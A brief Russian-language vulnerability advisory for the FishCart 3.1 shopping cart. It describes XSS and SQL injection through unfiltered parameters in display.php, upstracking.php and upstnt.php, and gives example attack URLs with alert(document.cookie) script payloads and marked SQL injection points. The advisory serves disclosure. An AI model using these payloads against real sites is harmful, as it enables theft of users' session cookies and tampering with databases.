Программа: FishCart 3.1

Уязвимости позволяют удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения. Уязвимость
существует из-за недостаточной фильтрации
входных данных в параметре nlst сценария
display.php и параметры trackingnum, reqagree, и m сценария
upstracking.php. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный HTML сценарий в
браузере жертвы в контексте безопасности
уязвимого сайта.

Примеры:

http://[target]/demo31/display.php?cartid=200505024231092&zid=1 &lid=1&nlst=’"><script>alert(document.cook
ie)</script>&

http://[target]/demo31/upstracking.php?trackingnum=’"><script>alert(
document.cookie)</script>&reqagree=checked&m=

http://[target]/demo31/upstrack ing.php?trackingnum= & reqagree=’"><script>alert(document.cookie)</script>&m=

http://[target]/demo31/upstracking.php?trackingnum= & reqagree=checked&m=’"><script>alert(document.
cookie)</script>

SQL-инъекция существует из-за
недостаточной проверки входных данных в
нескольких сценариях. Удаленный
пользователь может выполнить произвольные
SQL команды в базе данных приложения.

Примеры:

http://[target]/demo31/display.php?cartid=200505024231092&zid=1 &lid=1&nlst=y&olimit=0&cat=&key1=&psku=’SQL_INJECTION

http://[target]/demo31/upstnt.php?zid=1&lid=1& cartid=’SQL_INJECTION



Оставить мнение